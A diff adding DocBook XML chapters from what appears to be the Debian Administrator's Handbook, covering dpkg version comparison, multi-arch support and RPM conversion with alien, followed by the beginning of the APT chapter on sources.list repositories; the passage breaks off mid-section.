+ Breaks: debsig-verify (&lt;&lt; 0.15), dirmngr (&lt;&lt; 2.1.18-8~deb9u1), gnupg2 (&lt;&lt; 2.1.11-7+exp1), libgnupg-interface-perl (&lt;&lt; 0.52-3), libgnupg-perl (&lt;= 0.19-1), libmail-gnupg-perl (&lt;= 0.22-1), monkeysphere (&lt;&lt; 0.38~), php-crypt-gpg (&lt;= 1.4.1-1), python-apt (&lt;= 1.1.0~beta4), python-gnupg (&lt;&lt; 0.3.8-3), python3-apt (&lt;= 1.1.0~beta4)
+ Replaces: gnupg2 (&lt;&lt; 2.1.11-7+exp1)
+ Provides: gpg
+ Section: utils
+ Priority: optional
+ Multi-Arch: foreign
+ Homepage: https://www.gnupg.org/
+ Description: GNU privacy guard - a free PGP replacement
+  GnuPG is GNU's tool for secure communication and data storage.
+  It can be used to encrypt data and to create digital signatures.
+  It includes an advanced key management facility and is compliant
+  with the proposed OpenPGP Internet standard as described in RFC4880.
+[...]</computeroutput></screen>
+
+			</example>
+			 <sidebar> <title><emphasis>GOING FURTHER</emphasis> Comparison of versions</title>
+			 <indexterm>
+				<primary>version, comparison</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>comparison of versions</primary>
+			</indexterm>
+			 <para>
+				Since <command>dpkg</command> is the program for handling Debian packages, it also provides the reference implementation of the logic of comparing version numbers. This is why it has a <literal>--compare-versions</literal> option, usable by external programs (especially configuration scripts executed by <command>dpkg</command> itself). This option requires three parameters: a version number, a comparison operator, and a second version number. The different possible operators are <literal>lt</literal> (strictly less than), <literal>le</literal> (less than or equal to), <literal>eq</literal> (equal), <literal>ne</literal> (not equal), <literal>ge</literal> (greater than or equal to), and <literal>gt</literal> (strictly greater than). If the comparison is correct, <command>dpkg</command> returns 0 (success); if not, it gives a non-zero return value (indicating failure).
+			</para>
+			 
+<screen>
+<computeroutput>$ </computeroutput><userinput>dpkg --compare-versions 1.2-3 gt 1.1-4</userinput>
+<computeroutput>$ </computeroutput><userinput>echo $?</userinput>
+<computeroutput>0
+$ </computeroutput><userinput>dpkg --compare-versions 1.2-3 lt 1.1-4</userinput>
+<computeroutput>$ </computeroutput><userinput>echo $?</userinput>
+<computeroutput>1
+$ </computeroutput><userinput>dpkg --compare-versions 2.6.0pre3-1 lt 2.6.0-1</userinput>
+<computeroutput>$ </computeroutput><userinput>echo $?</userinput>
+<computeroutput>1</computeroutput></screen>
+			 <para>
+				Note the unexpected failure of the last comparison: for <command>dpkg</command>, <literal>pre</literal>, usually denoting a pre-release, has no particular meaning, and this program compares the alphabetic characters in the same way as the numbers (a &lt; b &lt; c ...), in alphabetical order. This is why it considers “<literal>0pre3</literal>” to be greater than “<literal>0</literal>”. When we want a package's version number to indicate that it is a pre-release, we use the tilde character, “<literal>~</literal>”:
+			</para>
+			 
+<screen>
+<computeroutput>$ </computeroutput><userinput>dpkg --compare-versions 2.6.0~pre3-1 lt 2.6.0-1</userinput>
+<computeroutput>$ </computeroutput><userinput>echo $?</userinput>
+<computeroutput>0</computeroutput></screen>
+			 </sidebar>
+		</section>
+		 <section>
+			<title><command>dpkg</command>'s Log File</title>
+			 <para>
+				<command>dpkg</command> keeps a log of all of its actions in <filename>/var/log/dpkg.log</filename>. This log is extremely verbose, since it details every one of the stages through which packages handled by <command>dpkg</command> go. In addition to offering a way to track dpkg's behavior, it helps, above all, to keep a history of the development of the system: one can find the exact moment when each package has been installed or updated, and this information can be extremely useful in understanding a recent change in behavior. Additionally, all versions being recorded, it is easy to cross-check the information with the <filename>changelog.Debian.gz</filename> for packages in question, or even with online bug reports.
+			</para>
+
+		</section>
+		 <section id="sect.multi-arch">
+			<title>Multi-Arch Support</title>
+			 <indexterm>
+				<primary>Multi-Arch</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>architecture</primary>
+				<secondary>multi-arch support</secondary>
+			</indexterm>
+			 <para>
+				All Debian packages have an <literal>Architecture</literal> field in their control information. This field can contain either “<literal>all</literal>” (for packages that are architecture independent) or the name of the architecture that it targets (like “amd64”, “armhf”, …). In the latter case, by default, <command>dpkg</command> will only accept to install the package if its architecture matches the host's architecture as returned by <command>dpkg --print-architecture</command>.
+			</para>
+			 <para>
+				This restriction ensures that users do not end up with binaries compiled for an incorrect architecture. Everything would be perfect except that (some) computers can run binaries for multiple architectures, either natively (an “amd64“ system can run “i386” binaries) or through emulators.
+			</para>
+			 <section>
+				<title>Enabling Multi-Arch</title>
+				 <para>
+					<command>dpkg</command>'s multi-arch support allows users to define “foreign architectures” that can be installed on the current system. This is simply done with <command>dpkg --add-architecture</command> like in the example below. There is a corresponding <command>dpkg --remove-architecture</command> to drop support of a foreign architecture, but it can only be used when no packages of this architecture remain.
+				</para>
+				 
+<screen>
+<computeroutput># </computeroutput><userinput>dpkg --print-architecture</userinput>
+<computeroutput>amd64
+# </computeroutput><userinput>dpkg --print-foreign-architectures</userinput>
+<computeroutput># </computeroutput><userinput>dpkg -i gcc-6-base_6.3.0-18_armhf.deb</userinput>
+<computeroutput>dpkg: error processing archive gcc-6-base_6.3.0-18_armhf.deb (--install):
+ package architecture (armhf) does not match system (amd64)
+Errors were encountered while processing:
+ gcc-6-base_6.3.0-18_armhf.deb
+# </computeroutput><userinput>dpkg --add-architecture armhf</userinput>
+<computeroutput># </computeroutput><userinput>dpkg --add-architecture armel</userinput>
+<computeroutput># </computeroutput><userinput>dpkg --print-foreign-architectures</userinput>
+<computeroutput>armhf
+armel
+# </computeroutput><userinput>dpkg -i gcc-6-base_6.3.0-18_armhf.deb</userinput>
+<computeroutput>Selecting previously unselected package gcc-6-base:armhf.
+(Reading database ... 112000 files and directories currently installed.)
+Preparing to unpack gcc-6-base_6.3.0-18_armhf.deb ...
+Unpacking gcc-6-base:armhf (6.3.0-18) ...
+Setting up gcc-6-base:armhf (6.3.0-18) ...
+# </computeroutput><userinput>dpkg --remove-architecture armhf</userinput>
+<computeroutput>dpkg: error: cannot remove architecture 'armhf' currently in use by the database
+# </computeroutput><userinput>dpkg --remove-architecture armel</userinput>
+<computeroutput># </computeroutput><userinput>dpkg --print-foreign-architectures</userinput>
+<computeroutput>armhf</computeroutput></screen>
+				 <sidebar> <title><emphasis>NOTE</emphasis> APT's multi-arch support</title>
+				 <para>
+					APT will automatically detect when dpkg has been configured to support foreign architectures and will start downloading the corresponding <filename>Packages</filename> files durings its update process.
+				</para>
+				 <para>
+					Foreign packages can then be installed with <command>apt install <replaceable>package</replaceable>:<replaceable>architecture</replaceable></command>.
+				</para>
+				 </sidebar> <sidebar> <title><emphasis>IN PRACTICE</emphasis> Using proprietary i386 binaries on amd64</title>
+				 <para>
+					There are multiple use cases for multi-arch, but the most popular one is the possibility to execute 32 bit binaries (i386) on 64 bit systems (amd64).
+				</para>
+				 </sidebar>
+			</section>
+			 <section>
+				<title>Multi-Arch Related Changes</title>
+				 <para>
+					To make multi-arch actually useful and usable, libraries had to be repackaged and moved to an architecture-specific directory so that multiple copies (targeting different architectures) can be installed alongside. Such updated packages contain the “<literal>Multi-Arch: same</literal>” header field to tell the packaging system that the various architectures of the package can be safely co-installed (and that those packages can only satisfy dependencies of packages of the same architecture). The most important libraries have been converted since the introduction of multi-arch in Debian <emphasis role="distribution">Wheezy</emphasis>, but there are many libraries that will likely never be converted unless someone specifically requests it (through a bug report for example).
+				</para>
+				 
+<screen><computeroutput>$ </computeroutput><userinput>dpkg -s gcc-6-base
+</userinput><computeroutput>dpkg-query: error: --status needs a valid package name but 'gcc-6-base' is not: ambiguous package name 'gcc-6-base' with more than one installed instance
+
+Use --help for help about querying packages.
+$ </computeroutput><userinput>dpkg -s gcc-6-base:amd64 gcc-6-base:armhf | grep ^Multi
+</userinput><computeroutput>Multi-Arch: same
+Multi-Arch: same
+$ </computeroutput><userinput>dpkg -L libgcc1:amd64 |grep .so
+</userinput><computeroutput>/lib/x86_64-linux-gnu/libgcc_s.so.1
+$ </computeroutput><userinput>dpkg -S /usr/share/doc/gcc-6-base/copyright
+</userinput><computeroutput>gcc-6-base:amd64, gcc-6-base:armhf: /usr/share/doc/gcc-6-base/copyright
+</computeroutput></screen>
+				 <para>
+					It is worth noting that <literal>Multi-Arch: same</literal> packages must have their names qualified with their architecture to be unambiguously identifiable. They also have the possibility to share files with other instances of the same package; <command>dpkg</command> ensures that all packages have bit-for-bit identical files when they are shared. Last but not least, all instances of a package must have the same version. They must thus be upgraded together.
+				</para>
+				 <para>
+					Multi-Arch support also brings some interesting challenges in the way dependencies are handled. Satisfying a dependency requires either a package marked “<literal>Multi-Arch: foreign</literal>” or a package whose architecture matches the one of the package declaring the dependency (in this dependency resolution process, architecture-independent packages are assumed to be of the same architecture than the host). A dependency can also be weakened to allow any architecture to fulfill it, with the <literal><replaceable>package</replaceable>:any</literal> syntax, but foreign packages can only satisfy such a dependency if they are marked “<literal>Multi-Arch: allowed</literal>”.
+				</para>
+
+			</section>
+
+		</section>
+
+	</section>
+	 <section id="sect.coexistence-with-other-packaging-systems">
+		<title>Coexistence with Other Packaging Systems</title>
+		 <indexterm>
+			<primary>RPM</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Red Hat Package Manager</primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>alien</command></primary>
+		</indexterm>
+		 <para>
+			Debian packages are not the only software packages used in the free software world. The main competitor is the RPM format of the Red Hat Linux distribution and its many derivatives. Red Hat is a very popular, commercial distribution. It is thus common for software provided by third parties to be offered as RPM packages rather than Debian.
+		</para>
+		 <para>
+			In this case, you should know that the program <command>rpm</command>, which handles RPM packages, is available as a Debian package, so it is possible to use this package format on Debian. Care should be taken, however, to limit these manipulations to extract the information from a package or to verify its integrity. It is, in truth, unreasonable to use <command>rpm</command> to install an RPM on a Debian system; RPM uses its own database, separate from those of native software (such as <command>dpkg</command>). This is why it is not possible to ensure a stable coexistence of two packaging systems.
+		</para>
+		 <para>
+			On the other hand, the <emphasis role="pkg">alien</emphasis> utility can convert RPM packages into Debian packages, and vice versa.
+		</para>
+		 <sidebar> <title><emphasis>COMMUNITY</emphasis> Encouraging the adoption of <filename>.deb</filename></title>
+		 <para>
+			If you regularly use the <command>alien</command> program to install RPM packages coming from one of your providers, do not hesitate to write to them and amicably express your strong preference for the <filename>.deb</filename> format. Note that the format of the package is not everything: a <filename>.deb</filename> package built with <command>alien</command> or prepared for a version of Debian different than that which you use, or even for a derivative distribution like Ubuntu, would probably not offer the same level of quality and integration as a package specifically developed for Debian <emphasis role="distribution">Stretch</emphasis>.
+		</para>
+		 </sidebar> 
+<screen>
+<computeroutput>$ </computeroutput><userinput>fakeroot alien --to-deb phpMyAdmin-4.7.5-2.fc28.noarch.rpm</userinput>
+<computeroutput>phpmyadmin_4.7.5-3_all.deb generated
+$ </computeroutput><userinput>ls -s phpmyadmin_4.7.5-3_all.deb</userinput>
+<computeroutput>  4356 phpmyadmin_4.7.5-3_all.deb</computeroutput></screen>
+		 <para>
+			You will find that this process is extremely simple. You must know, however, that the package generated does not have any dependency information, since the dependencies in the two packaging formats don't have systematic correspondence. The administrator must thus manually ensure that the converted package will function correctly, and this is why Debian packages thus generated should be avoided as much as possible. Fortunately, Debian has the largest collection of software packages of all distributions, and it is likely that whatever you seek is already in there.
+		</para>
+		 <para>
+			Looking at the man page for the <command>alien</command> command, you will also note that this program handles other packaging formats, especially the one used by the Slackware distribution (it is made of a simple <filename>tar.gz</filename> archive).
+		</para>
+		 <para>
+			The stability of the software deployed using the <command>dpkg</command> tool contributes to Debian's fame. The APT suite of tools, described in the following chapter, preserves this advantage, while relieving the administrator from managing the status of packages, a necessary but difficult task.
+		</para>
+
+	</section>
+</chapter>
+
diff --git a/tmp/cs-CZ/xml/06_apt.xml b/tmp/cs-CZ/xml/06_apt.xml
new file mode 100644
index 000000000..83e6f61ac
--- /dev/null
+++ b/tmp/cs-CZ/xml/06_apt.xml
@@ -0,0 +1,1577 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="apt" lang="cs-CZ">
+	<chapterinfo>
+		 <keywordset>
+			<keyword>apt</keyword>
+			 <keyword>apt-get</keyword>
+			 <keyword>apt-cache</keyword>
+			 <keyword>aptitude</keyword>
+			 <keyword>synaptic</keyword>
+			 <keyword>sources.list</keyword>
+			 <keyword>apt-cdrom</keyword>
+
+		</keywordset>
+
+	</chapterinfo>
+	 <title>Maintenance and Updates: The APT Tools</title>
+	 <highlights> <para>
+		What makes Debian so popular with administrators is how easily software can be installed and how easily the whole system can be updated. This unique advantage is largely due to the <emphasis>APT</emphasis> program, that Falcot Corp administrators studied with enthusiasm.
+	</para>
+	 </highlights> <para>
+		<indexterm><primary>APT</primary></indexterm> <indexterm><primary>Advanced Package Tool</primary></indexterm> APT is the abbreviation for Advanced Package Tool. What makes this program “advanced” is its approach to packages. It doesn't simply evaluate them individually, but it considers them as a whole and produces the best possible combination of packages depending on what is available and compatible (according to dependencies).
+	</para>
+	 <sidebar> <title><emphasis>VOCABULARY</emphasis> Package source and source package</title>
+	 <para>
+		The word <emphasis>source</emphasis> can be ambiguous. A source package — a package containing the source code of a program — should not be confused with a package source — a repository (website, FTP server, CD-ROM, local directory, etc.) which contains packages.
+	</para>
+	 </sidebar> <para>
+		APT needs to be given a “list of package sources”: the file <filename>/etc/apt/sources.list</filename> will list the different repositories (or “sources”) that publish Debian packages. APT will then import the list of packages published by each of these sources. This operation is achieved by downloading <filename>Packages.xz</filename> or a variant using a different compression method (such as <filename>Packages.gz</filename> or <filename>.bz2</filename>) files (in case of a source of binary packages) and <filename>Sources.xz</filename> or a variant (in case of a source of source packages) and by analyzing their contents. When an old copy of these files is already present, APT can update it by only downloading the differences (see sidebar <xref linkend="sidebar.apt-pdiff" />).
+	</para>
+	 <indexterm>
+		<primary><filename>Packages.xz</filename></primary>
+	</indexterm>
+	 <indexterm>
+		<primary><filename>Sources.xz</filename></primary>
+	</indexterm>
+	 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> <command>gzip</command>, <command>bzip2</command>, <command>LZMA</command> and <command>XZ</command> Compression</title>
+	 <indexterm>
+		<primary><command>gzip</command></primary>
+	</indexterm>
+	 <indexterm>
+		<primary><command>bzip2</command></primary>
+	</indexterm>
+	 <indexterm>
+		<primary><command>lzma</command></primary>
+	</indexterm>
+	 <indexterm>
+		<primary><command>xz</command></primary>
+	</indexterm>
+	 <para>
+		A <filename>.gz</filename> extension refers to a file compressed with the <command>gzip</command> utility. <command>gzip</command> is the fast and efficient traditional Unix utility to compress files. Newer tools achieve better rates of compression but require more resources (computation time and memory) to compress and uncompress a file. Among them, and by order of appearance, there are <command>bzip2</command> (generating files with a <filename>.bz2</filename> extension), <command>lzma</command> (generating <filename>.lzma</filename> files) and <command>xz</command> (generating <filename>.xz</filename> files).
+	</para>
+	 </sidebar> <section id="sect.apt-sources.list">
+		<title>Filling in the <filename>sources.list</filename> File</title>
+		 <indexterm>
+			<primary><filename>sources.list</filename></primary>
+		</indexterm>
+		 <indexterm>
+			<primary>source</primary>
+			<secondary>of packages</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>package</primary>
+			<secondary>source of</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary><filename>/etc/apt/sources.list</filename></primary>
+		</indexterm>
+		 <section>
+			<title>Syntax</title>
+			 <para>
+				Each active line of the <filename>/etc/apt/sources.list</filename> file contains the description of a source, made of 3 parts separated by spaces.
+			</para>
+			 <para>
+				The first field indicates the source type:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						“<literal>deb</literal>” for binary packages,
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						“<literal>deb-src</literal>” for source packages.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				The second field gives the base URL of the source (combined with the filenames present in the <filename>Packages.xz</filename> files, it must give a full and valid URL): this can consist in a Debian mirror or in any other package archive set up by a third party. The URL can start with <literal>file://</literal> to indicate a local source installed in the system's file hierarchy, with <literal>http://</literal> to indicate a source accessible from a web server, or with <literal>ftp://</literal> for a source available on an FTP server. The URL can also start with <literal>cdrom:</literal> for CD-ROM/DVD-ROM/Blu-ray disc based installations, although this is less frequent, since network-based installation methods are more and more common.
+			</para>
+			 <para>
+				The syntax of the last field depends on the structure of the repository. In the simplest cases, you can simply indicate a subdirectory (with a required trailing slash) of the desired source (this is often a simple “<filename>./</filename>” which refers to the absence of a subdirectory — the packages are then directly at the specified URL). But in the most common case, the repositories will be structured like a Debian mirror, with multiple distributions each having multiple components. In those cases, name the chosen distribution (by its “codename” — see the list in sidebar <xref linkend="sidebar.bruce-perens" /> — or by the corresponding “suites” — <literal>stable</literal>, <literal>testing</literal>, <literal>unstable</literal>), then the components (or sections) to enable (chosen between <literal>main</literal>, <literal>contrib</literal>, and <literal>non-free</literal> in a typical Debian mirror).
+			</para>
+			 <sidebar id="sidebar.sections"> <title><emphasis>VOCABULARY</emphasis> The <literal>main</literal>, <literal>contrib</literal> and <literal>non-free</literal> archives</title>
+			 <indexterm>
+				<primary>section</primary>
+				<secondary><literal>main</literal></secondary>
+			</indexterm>
+			 <indexterm>
+				<primary><literal>main</literal>, section</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>section</primary>
+				<secondary><literal>contrib</literal></secondary>
+			</indexterm>
+			 <indexterm>
+				<primary><literal>contrib</literal>, section</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>section</primary>
+				<secondary><literal>non-free</literal></secondary>
+			</indexterm>
+			 <indexterm>
+				<primary><literal>non-free</literal>, section</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>component (of a repository)</primary>
+			</indexterm>
+			 <para>
+				Debian uses three sections to differentiate packages according to the licenses chosen by the authors of each work. <literal>Main</literal> gathers all packages which fully comply with the Debian Free Software Guidelines.
+			</para>
+			 <para>
+				The <literal>non-free</literal> archive is different because it contains software which does not (entirely) conform to these principles but which can nevertheless be distributed without restrictions. This archive, which is not officially part of Debian, is a service for users who could need some of those programs — however Debian always recommends giving priority to free software. The existence of this section represents a considerable problem for Richard M. Stallman and keeps the Free Software Foundation from recommending Debian to users.
+			</para>
+			 <para>
+				<literal>Contrib</literal> (contributions) is a set of open source software which cannot function without some non-free elements. These elements can be software from the <literal>non-free</literal> section, or non-free files such as game ROMs, BIOS of consoles, etc. <literal>Contrib</literal> also includes free software whose compilation requires proprietary elements. This was initially the case for the OpenOffice.org office suite, which used to require a proprietary Java environment.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>TIP</emphasis> <filename>/etc/apt/sources.list.d/*.list</filename> files</title>
+			 <para>
+				If many package sources are referenced, it can be useful to split them in multiple files. Each part is then stored in <filename>/etc/apt/sources.list.d/<replaceable>filename</replaceable>.list</filename> (see sidebar <xref linkend="sidebar.directory.d" />).
+			</para>
+			 </sidebar> <indexterm>
+				<primary><command>apt-cdrom</command></primary>
+			</indexterm>
+			 <para>
+				The <literal>cdrom</literal> entries describe the CD/DVD-ROMs you have. Contrary to other entries, a CD-ROM is not always available since it has to be inserted into the drive and since only one disc can be read at a time. For those reasons, these sources are managed in a slightly different way, and need to be added with the <command>apt-cdrom</command> program, usually executed with the <literal>add</literal> parameter. The latter will then request the disc to be inserted in the drive and will browse its contents looking for <filename>Packages</filename> files. It will use these files to update its database of available packages (this operation is usually done by the <command>apt update</command> command). From then on, APT can require the disc to be inserted if it needs one of its packages.
+			</para>
+
+		</section>
+		 <section>
+			<title>Repositories for <emphasis role="distribution">Stable</emphasis> Users</title>
+			 <para>
+				Here is a standard <filename>sources.list</filename> for a system running the <emphasis role="distribution">Stable</emphasis> version of Debian:
+			</para>
+			 <example id="example.stable-sources-list">
+				<title><filename>/etc/apt/sources.list</filename> file for users of Debian Stable</title>
+				 
+<programlisting># Security updates
+deb http://security.debian.org/ stretch/updates main contrib non-free
+deb-src http://security.debian.org/ stretch/updates main contrib non-free
+
+## Debian mirror
+
+# Base repository
+deb http://deb.debian.org/debian stretch main contrib non-free
+deb-src http://deb.debian.org/debian stretch main contrib non-free
+
+# Stable updates
+deb http://deb.debian.org/debian stretch-updates main contrib non-free
+deb-src http://deb.debian.org/debian stretch-updates main contrib non-free
+
+# Stable backports
+deb http://deb.debian.org/debian stretch-backports main contrib non-free
+deb-src http://deb.debian.org/debian stretch-backports main contrib non-free
+</programlisting>
+
+			</example>
+			 <para>
+				This file lists all sources of packages associated with the <emphasis role="distribution">Stretch</emphasis> version of Debian (the current <emphasis role="distribution">Stable</emphasis> as of this writing). We opted to name “stretch” explicitly instead of using the corresponding “stable“ alias (<literal>stable</literal>, <literal>stable-updates</literal>, <literal>stable-backports</literal>) because we don't want to have the underlying distribution changed outside of our control when the next stable release comes out.
+			</para>
+			 <para>
+				Most packages will come from the “base repository” which contains all packages but is seldom updated (about once every 2 months for a “point release”). The other repositories are partial (they do not contain all packages) and can host updates (packages with newer version) that APT might install. The following sections will explain the purpose and the rules governing each of those repositories.
+			</para>
+			 <para>
+				Note that when the desired version of a package is available on several repositories, the first one listed in the <filename>sources.list</filename> file will be used. For this reason, non-official sources are usually added at the end of the file.
+			</para>
+			 <para>
+				As a side note, most of what this section says about <emphasis role="distribution">Stable</emphasis> applies equally well to <emphasis role="distribution">Oldstable</emphasis> since the latter is just an older <emphasis role="distribution">Stable</emphasis> that is maintained in parallel.
+			</para>
+			 <section id="sect.security-updates">
+				<title>Security Updates</title>
+				 <indexterm>
+					<primary><literal>security.debian.org</literal></primary>
+				</indexterm>
+				 <indexterm>
+					<primary>security updates</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>updates</primary>
+					<secondary>security updates</secondary>
+				</indexterm>
+				 <para>
+					The security updates are not hosted on the usual network of Debian mirrors but on <literal>security.debian.org</literal> (on a small set of machines maintained by the <link linkend="dsa-team">Debian System Administrators</link>). This archive contains security updates (prepared by the Debian Security Team and/or by package maintainers) for the <emphasis role="distribution">Stable</emphasis> distribution.
+				</para>
+				 <para>
+					The server can also host security updates for <emphasis role="distribution">Testing</emphasis> but this doesn't happen very often since those updates tend to reach <emphasis role="distribution">Testing</emphasis> via the regular flow of updates coming from <emphasis role="distribution">Unstable</emphasis>.
+				</para>
+
+			</section>
+			 <section id="sect.stable-updates">
+				<title>Stable Updates</title>
+				 <indexterm>
+					<primary>stable updates</primary>
+				</indexterm>
+				 <indexterm>
+					<primary><literal>stable-updates</literal></primary>
+				</indexterm>
+				 <indexterm>
+					<primary>updates</primary>
+					<secondary>stable updates</secondary>
+				</indexterm>
+				 <para>
+					Stable updates are not security sensitive but are deemed important enough to be pushed to users before the next stable point release.
+				</para>
+				 <para>
+					This repository will typically contain fixes for critical bugs which could not be fixed before release or which have been introduced by subsequent updates. Depending on the urgency, it can also contain updates for packages that have to evolve over time… like <emphasis role="pkg">spamassassin</emphasis>'s spam detection rules, <emphasis role="pkg">clamav</emphasis>'s virus database, or the daylight-saving time rules of all timezones (<emphasis role="pkg">tzdata</emphasis>).
+				</para>
+				 <para>
+					In practice, this repository is a subset of the <literal>proposed-updates</literal> repository, carefully selected by the Stable Release Managers.
+				</para>
+
+			</section>
+			 <section id="sect.proposed-updates">
+				<title>Proposed Updates</title>
+				 <indexterm>
+					<primary><literal>proposed-updates</literal></primary>
+				</indexterm>
+				 <indexterm>
+					<primary><literal>stable-proposed-updates</literal></primary>
+				</indexterm>
+				 <para>
+					Once published, the <emphasis role="distribution">Stable</emphasis> distribution is only updated about once every 2 months. The <literal>proposed-updates</literal> repository is where the expected updates are prepared (under the supervision of the Stable Release Managers).
+				</para>
+				 <para>
+					The security and stable updates documented in the former sections are always included in this repository, but there is more too, because package maintainers also have the opportunity to fix important bugs that do not deserve an immediate release.
+				</para>
+				 <para>
+					Anyone can use this repository to test those updates before their official publication. The extract below uses the <literal>stretch-proposed-updates</literal> alias which is both more explicit and more consistent since <literal>jessie-proposed-updates</literal> also exists (for the <emphasis role="distribution">Oldstable</emphasis> updates):
+				</para>
+				 
+<programlisting>deb http://ftp.debian.org/debian stretch-proposed-updates main contrib non-free
+</programlisting>
+
+			</section>
+			 <section id="sect.backports">
+				<title>Stable Backports</title>
+				 <indexterm>
+					<primary><literal>stable-backports</literal></primary>
+				</indexterm>
+				 <indexterm>
+					<primary>backport</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>updates</primary>
+					<secondary>backports</secondary>
+				</indexterm>
+				 <para>
+					The <literal>stable-backports</literal> repository hosts “package backports”. The term refers to a package of some recent software which has been recompiled for an older distribution, generally for <emphasis role="distribution">Stable</emphasis>.
+				</para>
+				 <para>
+					When the distribution becomes a little dated, numerous software projects have released new versions that are not integrated into the current <emphasis role="distribution">Stable</emphasis> (which is only modified to address the most critical problems, such as security problems). Since the <emphasis role="distribution">Testing</emphasis> and <emphasis role="distribution">Unstable</emphasis> distributions can be more risky, package maintainers sometimes offer recompilations of recent software applications for <emphasis role="distribution">Stable</emphasis>, which has the advantage to limit potential instability to a small number of chosen packages. <ulink type="block" url="http://backports.debian.org" />
+				</para>
+				 <indexterm>
+					<primary><literal>backports.debian.org</literal></primary>
+				</indexterm>
+				 <para>
+					Backports from <literal>stable-backports</literal> are always created from packages available in <emphasis role="distribution">Testing</emphasis>. This ensures that all installed backports will be upgradable to the corresponding stable version once the next stable release of Debian is available.
+				</para>
+				 <para>
+					Even though this repository provides newer versions of packages, APT will not install them unless you give explicit instructions to do so (or unless you have already done so with a former version of the given backport):
+				</para>
+				 
+<screen><computeroutput>$ </computeroutput><userinput>sudo apt-get install <replaceable>package</replaceable>/stretch-backports
+</userinput><computeroutput>$ </computeroutput><userinput>sudo apt-get install -t stretch-backports <replaceable>package</replaceable>
+</userinput></screen>
+
+			</section>
+
+		</section>
+		 <section>
+			<title>Repositories for <emphasis role="distribution">Testing</emphasis>/<emphasis role="distribution">Unstable</emphasis> Users</title>
+			 <para>
+				Here is a standard <filename>sources.list</filename> for a system running the <emphasis role="distribution">Testing</emphasis> or <emphasis role="distribution">Unstable</emphasis> version of Debian:
+			</para>
+			 <example id="example.testing-sources-list">
+				<title><filename>/etc/apt/sources.list</filename> file for users of Debian <emphasis role="distribution">Testing</emphasis>/<emphasis role="distribution">Unstable</emphasis></title>
+				 
+<programlisting>
+# Unstable
+deb http://deb.debian.org/debian unstable main contrib non-free
+deb-src http://deb.debian.org/debian unstable main contrib non-free
+
+# Testing
+deb http://deb.debian.org/debian testing main contrib non-free
+deb-src http://deb.debian.org/debian testing main contrib non-free
+
+# Stable
+deb http://deb.debian.org/debian stable main contrib non-free
+deb-src http://deb.debian.org/debian stable main contrib non-free
+
+# Security updates
+deb http://security.debian.org/ stable/updates main contrib non-free
+deb http://security.debian.org/ testing/updates main contrib non-free
+deb-src http://security.debian.org/ stable/updates main contrib non-free
+deb-src http://security.debian.org/ testing/updates main contrib non-free
+</programlisting>
+
+			</example>
+			 <para>
+				With this <filename>sources.list</filename> file APT will install packages from <emphasis role="distribution">Unstable</emphasis>. If that is not desired, use the <literal>APT::Default-Release</literal> setting (see <xref linkend="sect.apt-upgrade" />) to instruct APT to pick packages from another distribution (most likely <emphasis role="distribution">Testing</emphasis> in this case).
+			</para>
+			 <para>
+				There are good reasons to include all those repositories, even though a single one should be enough. <emphasis role="distribution">Testing</emphasis> users will appreciate the possibility to cherry-pick a fixed package from <emphasis role="distribution">Unstable</emphasis> when the version in <emphasis role="distribution">Testing</emphasis> is affected by an annoying bug. On the opposite, <emphasis role="distribution">Unstable</emphasis> users bitten by unexpected regressions have the possibility to downgrade packages to their (supposedly working) <emphasis role="distribution">Testing</emphasis> version.
+			</para>
+			 <para>
+				The inclusion of <emphasis role="distribution">Stable</emphasis> is more debatable but it often gives access to some packages which have been removed from the development versions. It also ensures that you get the latest updates for packages which have not been modified since the last stable release.
+			</para>
+			 <section>
+				<title>The <emphasis role="distribution">Experimental</emphasis> Repository</title>
+				 <indexterm>
+					<primary><emphasis role="distribution">Experimental</emphasis></primary>
+				</indexterm>
+				 <para>
+					The archive of <emphasis role="distribution">Experimental</emphasis> packages is present on all Debian mirrors, and contains packages which are not in the <emphasis role="distribution">Unstable</emphasis> version yet because of their substandard quality — they are often software development versions or pre-versions (alpha, beta, release candidate…). A package can also be sent there after undergoing subsequent changes which can generate problems. The maintainer then tries to uncover them with help from advanced users who can handle important issues. After this first stage, the package is moved into <emphasis role="distribution">Unstable</emphasis>, where it reaches a much larger audience and where it will be tested in much more detail.
+				</para>
+				 <para>
+					<emphasis role="distribution">Experimental</emphasis> is generally used by users who do not mind breaking their system and then repairing it. This distribution gives the possibility to import a package which a user wants to try or use as the need arises. That is exactly how Debian approaches it, since adding it in APT's <filename>sources.list</filename> file does not lead to the systematic use of its packages. The line to be added is:
+				</para>
+				 <informalexample> 
+<programlisting>deb http://deb.debian.org/debian experimental main contrib non-free
+</programlisting>
+				 </informalexample>
+			</section>
+
+		</section>
+		 <section>
+			<title>Using Alternate Mirrors</title>
+			 <indexterm>
+				<primary><literal>deb.debian.org</literal></primary>
+			</indexterm>
+			 <para>
+				The <filename>sources.list</filename> examples in this chapter refer to package repositories hosted on <literal>deb.debian.og</literal>. Those URLs will redirect you to servers which are close to you and which are managed by Content Delivery Networks (<acronym>CDN</acronym>) whose main role is to store multiple copies of the files across the world to deliver them as fast as possible to users. The CDN companies that Debian is working with are Debian partners who are offering their services freely to Debian. While none of those servers are under direct control of Debian, the fact that the whole archive is sealed by GPG signatures makes it a non-issue.
+			</para>
+			 <indexterm>
+				<primary>mirror list</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>list of mirrors</primary>
+			</indexterm>
+			 <para>
